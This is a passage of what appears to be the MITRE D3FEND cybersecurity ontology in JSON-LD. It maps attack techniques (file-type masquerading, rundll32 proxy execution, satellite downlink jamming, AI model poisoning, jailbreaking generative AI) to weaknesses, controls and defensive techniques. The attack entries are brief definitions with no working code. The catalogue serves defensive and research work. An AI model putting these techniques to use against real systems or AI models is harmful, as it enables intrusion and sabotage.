      "d3f:definition": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file is `0xFF 0xD8` and the file extension is either `.JPE`, `.JPEG` or `.JPG`.",
      "rdfs:label": "Masquerade File Type",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:StrongPasswordPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:StrongPasswordPolicy"
      ],
      "d3f:d3fend-id": "D3-SPP",
      "d3f:definition": "Modifying system configuration to increase password strength.",
      "d3f:kb-article": "## How it works\nPassword strength guidelines include increasing password length, permitting passwords that contain ASCII or Unicode characters, and requiring systems to screen new passwords against lists of commonly used or compromised passwords.\n## Considerations\nExtremely complex password requirements may lead users to save passwords in text files or pick obvious passwords that meet the policy.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3"
        },
        {
          "@id": "d3f:Reference-Testing_Metrics_for_Password_Creation_Policies_by_Attacking_Large_Sets_of_Revealed_Passwords"
        }
      ],
      "d3f:strengthens": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Strong Password Policy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:Nfe048a049ccc459f9fc4e0457d353352"
        }
      ]
    },
    {
      "@id": "_:Nfe048a049ccc459f9fc4e0457d353352",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:T1085",
      "@type": "owl:Class",
      "d3f:attack-id": "T1085",
      "d3f:definition": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.011",
      "rdfs:label": "Rundll32",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:IMP-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0005",
      "d3f:definition": "Measures designed to permanently eliminate the use of a system, potentially through some physical damage to the system. Threat actors may destroy data, commands, subsystems, or attempt to destroy the victim spacecraft itself. This behavior is different from Degradation, as the individual parts are destroyed rather than put in a position in which they would slowly degrade over time.",
      "rdfs:label": "Destruction - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Destruction"
    },
    {
      "@id": "d3f:RD-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.02",
      "d3f:definition": "Instead of building dishes, adversaries may rent time on commercial ground networks or cloud-integrated “ground-station-as-a-service.” Access can be obtained legitimately (front companies, weak vetting) or via compromised customer accounts, allowing schedule requests, RF front-end configuration, and data egress through reputable providers. The appeal is speed, global reach, and plausible deniability; the risk to defenders is that traffic originates from expected stations and IP ranges. Misuse may include reconnaissance (passive capture), selective denial (misconfiguration or saturation attempts), or, where authentication is weak, unauthorized commanding.",
      "rdfs:label": "Commercial Ground Station Services - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Commercial Ground Station Services"
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-004%3ACredentialsInFiles%26Registry_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-004/"
      },
      "d3f:kb-abstract": "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-004: Credentials in Files & Registry",
      "rdfs:label": "Reference - CAR-2020-09-004: Credentials in Files & Registry - MITRE"
    },
    {
      "@id": "d3f:PhysicalArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Physical Artifact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Artifact"
        },
        {
          "@id": "_:N7f95fb328a5347d0a9b397c9237044b7"
        }
      ],
      "skos:altLabel": "Physical Object"
    },
    {
      "@id": "_:N7f95fb328a5347d0a9b397c9237044b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-location"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:CCI-001428_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system displays security attributes in human-readable form on each object that the system transmits to output devices to identify organization-identified special dissemination, handling, or distribution instructions using organization-identified human-readable, standard naming conventions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001428"
    },
    {
      "@id": "d3f:Reference-ArchitectureOfTransparentNetworkSecurityForApplicationContainers_NeuvectorInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170093922A1"
      },
      "d3f:kb-abstract": "A system comprises one or more application containers, each application container including computer-readable instructions and initiated via a container service and isolated using operating system-level virtualization. The system also comprises one or more virtual switches configured to route traffic from the application containers. The system further comprises one or more security containers, each security container configured to transparently intercept traffic from the one or more application containers for analysis of network security. The system further comprises a user interface (UI) container configured to receive configuration settings from a user. The system also comprises an analytics container configured to perform analysis on data received from the one or more security containers. The system also comprises a management container configured to configure settings for the one or more security containers and the analytics container.",
      "d3f:kb-author": "Gang Duan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Neuvector Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Architecture of transparent network security for application containers",
      "rdfs:label": "Reference - Architecture of transparent network security for application containers - Neuvector Inc"
    },
    {
      "@id": "d3f:Condition",
      "@type": "owl:Class",
      "d3f:definition": "An assumption on which rests the validity or effect of something else.",
      "rdfs:comment": "Less common usage versus state, meant to superclass precondition, postcondition, and effect.",
      "rdfs:isDefinedBy": "n-06768279",
      "rdfs:label": "Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-486",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-486",
      "d3f:definition": "The product compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.",
      "rdfs:label": "Comparison of Classes by Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1025"
      }
    },
    {
      "@id": "d3f:AccessMediator",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Access Mediator enforces access control policies to regulate interactions with a resource.",
      "d3f:implements": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:mediates-access-to": {
        "@id": "d3f:Resource"
      },
      "d3f:used-by": {
        "@id": "d3f:Agent"
      },
      "rdfs:label": "Access Mediator",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N43c216ffe3be45a6b625e799978ecdcd"
        },
        {
          "@id": "_:N41564901dd804f4f9552fad558813720"
        },
        {
          "@id": "_:N1ead1a49ab0848e291a56446695bb0cf"
        }
      ]
    },
    {
      "@id": "_:N43c216ffe3be45a6b625e799978ecdcd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:N41564901dd804f4f9552fad558813720",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:N1ead1a49ab0848e291a56446695bb0cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:used-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:ContentFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentFiltering"
      ],
      "d3f:d3fend-id": "D3-CF",
      "d3f:definition": "Content Filtering techniques aid in the process of analyzing an input file for malicious or erroneous content and outputing a sanitized version.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:enforces": {
        "@id": "d3f:ContentPolicy"
      },
      "d3f:filters": {
        "@id": "d3f:File"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N55f7b613ccae45ffb38b94a75341d46b"
        },
        {
          "@id": "_:Ne123ae17a9034e279e3a3294d0d97640"
        },
        {
          "@id": "_:N290b1bff893545619fae55647e2711f1"
        }
      ]
    },
    {
      "@id": "_:N55f7b613ccae45ffb38b94a75341d46b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "_:Ne123ae17a9034e279e3a3294d0d97640",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enforces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContentPolicy"
      }
    },
    {
      "@id": "_:N290b1bff893545619fae55647e2711f1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1599.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1599.001",
      "d3f:definition": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.",
      "rdfs:label": "Network Address Translation Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:T1599"
      }
    },
    {
      "@id": "d3f:AML.T0018.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.000",
      "d3f:definition": "Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model.\nAdversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process.\n\nThe change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.",
      "rdfs:label": "Poison AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Poison AI Model"
    },
    {
      "@id": "d3f:CWE-1117",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1117",
      "d3f:definition": "The code contains a function or method whose signature and/or associated inline documentation does not sufficiently describe the callable's inputs, outputs, side effects, assumptions, or return codes.",
      "rdfs:label": "Callable with Insufficient Behavioral Summary",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1145",
      "@type": "owl:Class",
      "d3f:attack-id": "T1145",
      "d3f:definition": "Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.004",
      "rdfs:label": "Private Keys",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1105",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1105",
      "d3f:definition": "Session is initiated by the client, and may be a custom protocol which is why it is related to generic network traffic instead of file transfer network traffic.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Ingress Tool Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nc3beb1e1821844a8a6c201f5ed087bfa"
        }
      ]
    },
    {
      "@id": "_:Nc3beb1e1821844a8a6c201f5ed087bfa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ExternalThing",
      "@type": "owl:Class",
      "rdfs:label": "External Thing"
    },
    {
      "@id": "d3f:ActivityDependency",
      "@type": "owl:Class",
      "d3f:definition": "An activity dependency is a dependency that indicates an activity has an activity or agent which relies on it in order to be functional.",
      "rdfs:label": "Activity Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:Capability",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Capability_(systems_engineering)"
      },
      "rdfs:label": "Capability",
      "rdfs:seeAlso": {
        "@id": "https://web.archive.org/web/20081123014953/http://www.dtic.mil/doctrine/jel/new_pubs/jp1_02.pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:Reference-RegistryKeySecurityAndAccessRights",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights"
      },
      "d3f:kb-abstract": "The Windows security model enables you to control access to registry keys. For more information about security, see Access-Control Model.",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "Registry Key Security and Access Rights",
      "rdfs:label": "Reference - Registry Key Security and Access Rights"
    },
    {
      "@id": "d3f:SystemConfigSystemCall",
      "@type": "owl:Class",
      "rdfs:label": "System Config System Call",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-789",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-789",
      "d3f:definition": "The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Memory Allocation with Excessive Size Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1284"
        },
        {
          "@id": "d3f:CWE-770"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001811_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system alerts organization-defined personnel or roles when the unauthorized installation of software is detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001811"
    },
    {
      "@id": "d3f:Reference-MalwareAnalysisSystem_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150319136A1"
      },
      "d3f:kb-abstract": "In some embodiments, a malware analysis system includes receiving a potential malware sample from a firewall; analyzing the potential malware sample using a virtual machine to determine if the potential malware sample is malware; and automatically generating a signature if the potential malware sample is determined to be malware. In some embodiments, the potential malware sample does not match a preexisting signature, and the malware is a zero-day attack.",
      "d3f:kb-author": "Huagang Xie; Xinran Wang; Jiangxia Liu",
      "d3f:kb-mitre-analysis": "This patent describes a VM sandbox environment that uses heuristic based analysis techniques performed in real-time during a file transfer to determine if the file is malicious. A new signature can then be generated and distributed to automatically block future file transfer requests to download the malicious file.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:kb-reference-title": "Malware analysis system",
      "rdfs:label": "Reference - Malware analysis system - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:EX-0016.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0016.02",
      "d3f:definition": "Downlink jammers target the users of a satellite by creating noise in the same frequency as the downlink signal from the satellite. A downlink jammer only needs to be as powerful as the signal being received on the ground and must be within the field of view of the receiving terminal’s antenna. This limits the number of users that can be affected by a single jammer. Since many ground terminals use directional antennas pointed at the sky, a downlink jammer typically needs to be located above the terminal it is attempting to jam. This limitation can be overcome by employing a downlink jammer on an air or space-based platform, which positions the jammer between the terminal and the satellite. This also allows the jammer to cover a wider area and potentially affect more users. Ground terminals with omnidirectional antennas, such as many GPS receivers, have a wider field of view and thus are more susceptible to downlink jamming from different angles on the ground.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "d3f:impairs": {
        "@id": "d3f:Receiver"
      },
      "d3f:jams": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Downlink Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0016"
        },
        {
          "@id": "_:N2949ce5a20654754bd154e98fce6e5cb"
        },
        {
          "@id": "_:Ncb277b147ab848e983e2454d5e08ce73"
        }
      ],
      "skos:prefLabel": "Downlink Jamming"
    },
    {
      "@id": "_:N2949ce5a20654754bd154e98fce6e5cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:Ncb277b147ab848e983e2454d5e08ce73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:jams"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:CWE-1127",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1127",
      "d3f:definition": "The code is compiled without sufficient warnings enabled, which may prevent the detection of subtle bugs or quality issues.",
      "rdfs:label": "Compilation with Insufficient Warnings or Errors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-363",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-363",
      "d3f:definition": "The product checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the product to access the wrong file.",
      "rdfs:label": "Race Condition Enabling Link Following",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-367"
      }
    },
    {
      "@id": "d3f:CWE-324",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-324",
      "d3f:definition": "The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.",
      "rdfs:label": "Use of a Key Past its Expiration Date",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:CCI-001426_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the binding of security attributes to information with sufficient assurance that the information--attribute association can be used as the basis for automated policy actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001426"
    },
    {
      "@id": "d3f:CCI-001685_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account disabling actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001685"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForUDPFloodAttackDetection-RioreyLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8307430B1"
      },
      "d3f:kb-abstract": "A system and method is provided to identify UDP attacks. A processor determines a spectral density of packet timing intervals, a natural distance between the spectral density and a uniform distribution, and a non-linear amplifier applying a non-linear amplification to the natural distance to detect a denial-of-service attack. It uses the concept of traffic statistics analysis, i.e., spectral densities of arrived-packet timing intervals, calculates the KL-distance measurement and makes decision based on the output of a non-linear Gaussian amplifier, with which one can easily adjust the amplifier via selecting different parameters of mean and variance to satisfy system requirements of false-positive and false-negative UDP attack detections.",
      "d3f:kb-author": "Hongda Chen, Lijin Lu",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for UDP flood attack detection",
      "rdfs:label": "Reference - Method and system for UDP flood attack detection - Riorey LLC"
    },
    {
      "@id": "d3f:may-evaluate",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-evaluate",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1406.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406.002",
      "d3f:definition": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.",
      "rdfs:label": "Software Packing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1406"
      },
      "skos:prefLabel": "Software Packing"
    },
    {
      "@id": "d3f:CCI-002309_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002309"
    },
    {
      "@id": "d3f:WindowsNtWriteFileGather",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes specified block of file with data from memory pages.",
      "rdfs:label": "Windows NtWriteFileGather",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:OpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "For most file systems, a program initializes access to a file in a file system using the open system call. This allocates resources associated to the file (the file descriptor), and returns a handle that the process will use to refer to that file. In some cases the open is performed by the first access. During the open, the filesystem may allocate memory for buffers, or it may wait until the first operation. Various other errors which may occur during the open include directory update failures, un-permitted multiple connections, media failures, communication link failures and device failures.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Open_(system_call)"
      },
      "rdfs:label": "Open File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne1472a48dab04b62bf5cca95b3c64eb9"
        }
      ]
    },
    {
      "@id": "_:Ne1472a48dab04b62bf5cca95b3c64eb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForDetectingAnomaliesOfAnInfrastructureInANetwork",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/AU2023200991A1/"
      },
      "d3f:kb-abstract": "The present invention relates to a method and to an apparatus for detecting anomalies of an infrastructure in a network comprising analysing a data packet (PD) exchanged in a network and identifying the network protocol and all the fields, through a network analyser (101), defining an identified protocol and identified fields of said data packet (PD), and, by means of computerized data processing means (102), extracting identification fields, to identify a device of the infrastructure in the network, matching the identified device with a plurality of predefined standard devices in a predefined devices knowledge database, to recognise a matching device, retrieving one or more allowed fields and one or more allowed protocols of the matching device from the predefined devices knowledge database, comparing the allowed fields and the allowed protocols respectively with the identified fields and the identified protocol, defining at least one critical state of the infrastructure when the identified fields differ from the allowed fields or when the identified protocol differ from the allowed protocols and signalling an anomaly of the infrastructure when at least one of the critical states is identified.",
      "d3f:kb-organization": "Nozomi Networks",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationProtocolCommandAnalysis"
      },
      "d3f:kb-reference-title": "Method and apparatus for detecting anomalies of an infrastructure in a network",
      "rdfs:label": "Reference - Method and apparatus for detecting anomalies of an infrastructure in a network"
    },
    {
      "@id": "d3f:CWE-1173",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1173",
      "d3f:definition": "The product does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library.",
      "rdfs:label": "Improper Use of Validation Framework",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:AML.T0016.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.002",
      "d3f:definition": "Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.\n\nAdversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.",
      "rdfs:label": "Generative AI - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Generative AI"
    },
    {
      "@id": "d3f:T1098.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.006",
      "d3f:definition": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)",
      "rdfs:label": "Additional Container Cluster Roles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:SetRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:ProcessorRegister"
      },
      "rdfs:label": "Set Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N2f818563bf524e4ba70c00b4954be3fe"
        }
      ]
    },
    {
      "@id": "_:N2f818563bf524e4ba70c00b4954be3fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:RoutingAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RoutingAccessMediation"
      ],
      "d3f:d3fend-id": "D3-RAM",
      "d3f:definition": "Routing access mediation is a network security approach that manages and controls access at the network layer using VPNs, tunneling protocols, firewall rules, and traffic inspection to ensure secure and efficient data routing.",
      "d3f:isolates": {
        "@id": "d3f:Network"
      },
